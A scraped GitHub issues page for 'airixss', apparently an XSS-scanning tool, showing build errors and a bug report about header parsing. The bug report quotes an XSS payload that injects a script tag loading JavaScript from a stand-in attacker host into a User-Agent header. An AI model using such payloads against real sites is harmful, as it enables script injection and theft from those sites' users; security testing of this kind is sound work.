GithubHelp home page GithubHelp logo

airixss's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar

airixss's Issues

Error in installing "is a program, not an importable package"

I am getting this error while installing

λ go build
go: finding module for package github.com/chromedp/cdproto/page
go: finding module for package github.com/chromedp/chromedp
go: downloading github.com/chromedp/chromedp v0.8.1
go: downloading github.com/chromedp/cdproto v0.0.0-20220428002153-285dfb42699c
go: found github.com/chromedp/cdproto/page in github.com/chromedp/cdproto v0.0.0-20220428002153-285dfb42699c
go: found github.com/chromedp/chromedp in github.com/chromedp/chromedp v0.8.1
........\go\pkg\mod\github.com\chromedp\[email protected]\emulate.go:5:2: found packages device (device.go) and main (gen.go) in C:\Users\Yaseen\go\pkg\mod\github.com\chromedp\[email protected]\device
........\go\pkg\mod\github.com\chromedp\[email protected]\input.go:9:2: import "github.com/chromedp/chromedp/kb" is a program, not an importable package

hi

airixss.go:14:9: no required module provides package github.com/chromedp/cdproto/page: go.mod file not found in current directory or any parent directory; see 'go help modules'
airixss.go:15:9: no required module provides package github.com/chromedp/chromedp: go.mod file not found in current directory or any parent directory; see 'go help modules'

Can't insert colon in header

Hi,
It's not possibile to insert colon and semicolon in header since the program split header and value when there's a colon or semicolon. For Example if you insert the following header:
"User-Agent: <script src="http://attacker/xss.js"></script>

The header is truncated becoming "User-Agent: <script src="http"

I thinks should be used a different simbols for splitting.
And maybe there's a way to escape these characters but i didn't find it. Thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.